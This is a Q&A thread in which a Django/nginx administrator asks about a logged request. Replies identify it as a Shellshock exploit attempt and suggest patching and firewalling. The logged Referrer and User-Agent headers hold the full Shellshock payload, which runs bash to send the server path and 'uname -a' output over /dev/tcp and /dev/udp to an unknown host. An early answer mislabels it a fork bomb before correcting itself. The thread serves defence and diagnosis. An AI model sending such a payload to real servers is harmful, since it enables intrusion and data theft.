# Django possible security attack

Tags: django, security, nginx

I've setup django to alert me through email when any request fails and I'm constantly receiving this email:

```
Referrer: () { :;}; /bin/bash -c "echo <<my_server_ip>>/cgi-bin/index.cgi  > /dev/tcp/<<unknown_ip>>/21; /bin/uname -a > /dev/tcp/<<unknown_ip>>/21; echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/udp/<<unknown_ip>>/21"
Requested URL: /cgi-bin/index.cgi
User agent: () { :;}; /bin/bash -c "echo <<my_server_ip>>/cgi-bin/index.cgi  > /dev/tcp/<<unknown_ip>>/21; /bin/uname -a > /dev/tcp/<<unknown_ip>>/21; echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/udp/<<unknown_ip>>/21"
IP address: 127.0.0.1
```

What does it mean? Should I bother?

I'm using nginx, ubuntu, gunicorn.

Comment: It's definitely an attack, though that doesn't mean it's successful. A good starting point to increase security is to set up iptables (a firewall) and tools such as fail2ban. You might get a better response on security.stackexchange.com.

Answer (score 3, accepted):

<s>This looks like an attempted [fork bomb](https://en.wikipedia.org/wiki/Fork_bomb):</s>

```
() { :;};
```

Fortunately, if your server is still running after that gets sent it means it is being sanitised or ignored.

---

As @TheGreatContini points out this is [actually an attempted Shellshock attack](https://blog.cloudflare.com/inside-shellshock/). Which makes my answer a little unsafe. Its worth making sure your server is fully patched and up-to-date, and check any outgoing traffic to make sure you weren't impacted.

Comment: Thanks @lego-stormtroopr. Yep, the server is still up and running, so it  failed.

Comment: I think it is an attempt at the shell shock vulnerability!  https://blog.cloudflare.com/inside-shellshock/

Comment: Agree with your updates to the post.  The original poster should test his server to see if he is vulnerable to shell shock.  If he is, then he has a very serious problem (once the hackers are in, they might have taken your data and set up a backdoor so they can come back at any time).

Answer (score 3):

It is an attempt to exploit the [shell shock](http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html) vulnerability.

Comment: Recommend you try this to see if you are safe: http://lifehacker.com/how-to-check-if-your-mac-or-linux-machine-is-vulnerable-1639211806